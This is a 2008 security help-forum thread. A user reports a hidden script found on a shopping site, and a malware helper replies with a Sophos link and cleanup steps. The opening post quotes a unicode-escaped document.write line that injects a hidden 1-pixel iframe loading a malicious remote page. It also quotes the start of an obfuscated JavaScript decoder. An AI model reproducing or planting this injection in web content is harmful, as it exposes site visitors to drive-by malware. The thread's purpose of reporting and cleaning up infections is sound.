Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Possibly Browser Hi-jack


  • Please log in to reply
2 replies to this topic

#1 switchez

switchez

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:08:02 AM

Posted 15 March 2008 - 03:13 AM

mostly due to thins being an old and slow machine but browsing to shop bot I found this funny script in the lines of

docu..write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0064\u006f\u0074\u0061\u002d\u0061\u006c\u006c\u002d\u0073\u0074\u0061\u0072\u002e\u0069\u006e\u0066\u006f\u002f\u0073\u0070\u006c\u0034\u002f\u0075\u0070\u0064\u0061\u0074\u0065\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');

WARNING TO BROWSE TO IT MAY BE TROUBLE
which changing to an alert shows that it's an 1 px iframe pointing to h t t p : / / dota-all-star. info/spl4/update.php

watching my taskmanager I see me Iexplore virtual memory go nuts :flowers: , way high.

after browsing to it an viewing the source there is a well obfuscated javascript being run.. :thumbsup: starts like this
function epcG7(BDYWZD1zTIK1){var x61lmfe73=0,f8FDFIkHWJNzJD=BDYWZD1zTIK1.length,EJBHWkn7xn=1024,p7QR9LYNZ,zJ6CcSCwfoW,gnWkb="",xPi9V9aeU024=x61lmfe73,JN3t1V7wBuS=x61lmfe73,hGgfsJMI2VoA7S=x61lmfe73,EThCA5E=Array(63,6,8,57,29,15,23,54,62,9,0,0,0,0,0,0,61,53,27,33,16,46,7,45,5,49,39,44,18,2,24,0,13,56,30,25,48,10,47,55,36,28,26,0,0,0,0,3,0,37,50,31,52,14,4,42,11,32,35,17,22,41,19,12,21,1,59,60,34,20,58,40,51,43,38);for(zJ6CcSCwfoW=Math.ceil(f8FDFIkHWJNzJD/EJBHWkn7xn);zJ6CcSCwfoW>x61lmfe73;zJ6CcSCwfoW--){for(p7QR9LYNZ=Math.min(f8FDFIkHWJNzJD,EJBHWkn7
if you'd like to see it all I can post it

now i'm wondering if anyone knows about this, has it done something, or just a site hijacking to shopbot, or perhaps where to report it.. I got no Idea.

?? Cheers

Edited by usasma, 15 March 2008 - 06:15 AM.


BC AdBot (Login to Remove)

 


#2 usasma

usasma

    Still visually handicapped (avatar is memory developed by my Dad


  • BSOD Kernel Dump Expert
  • 25,091 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Southeastern CT, USA
  • Local time:05:02 PM

Posted 15 March 2008 - 06:13 AM

Edited hotlink above

Edited by usasma, 15 March 2008 - 06:16 AM.
explanation

My browser caused a flood of traffic, sio my IP address was banned. Hope to fix it soon. Will get back to posting as soon as Im able.

- John  (my website: http://www.carrona.org/ )**If you need a more detailed explanation, please ask for it. I have the Knack. **  If I haven't replied in 48 hours, please send me a message. My eye problems have recently increased and I'm having difficult reading posts. (23 Nov 2017)FYI - I am completely blind in the right eye and ~30% blind in the left eye.<p>If the eye problems get worse suddenly, I may not be able to respond.If that's the case and help is needed, please PM a staff member for assistance.

#3 DASOS

DASOS

    Malware hunter


  • Security Colleague
  • 1,662 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greece loutraki 6 km from korinth canal
  • Local time:11:02 PM

Posted 15 March 2008 - 06:45 AM

Hi switchez

When you click at that link this is what you got:

http://www.sophos.com/security/analyses/vi...jbankereej.html


If you have a problem after that:

You should print out these instructions, or copy them to a NotePad file for reading while in Safe Mode, because you will not be able to connect to the Internet to read from this site.


Please download, install and update Avg Anti-Spyware 7.5.<--link DO NOT perform a scan yet..

Print out the Avg Install and Scan Instructions<--link

Please download ATF Cleaner<--link by Atribune.DO NOT use yet..

Reboot your computer in SAFE MODE"<--link using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup [but before the Windows icon appears] press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode".
Double-click ATF-Cleaner.exe to run the program.
Under Main choose: Select All
Click the Empty Selected button.
If you use Firefox browserClick Firefox at the top and choose: Select All
Click the Empty Selected button.
NOTE: If you would like to keep your saved passwords, please click No at the prompt.
If you use Opera browserClick Opera at the top and choose: Select All
Click the Empty Selected button.
NOTE: If you would like to keep your saved passwords, please click No at the prompt.
Click Exit on the Main menu to close the program.For Technical Support, double-click the e-mail address located at the bottom of each menu.]

now Scan with Avg per the "Safe Mode" instructions you printed out.
IMPORTANT: Do not open any other windows or programs while Avg is scanning, it may interfere with the scanning proccess.

Reboot back to normal mode.

If you are still having problems.. Come back and we'll advise you further.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users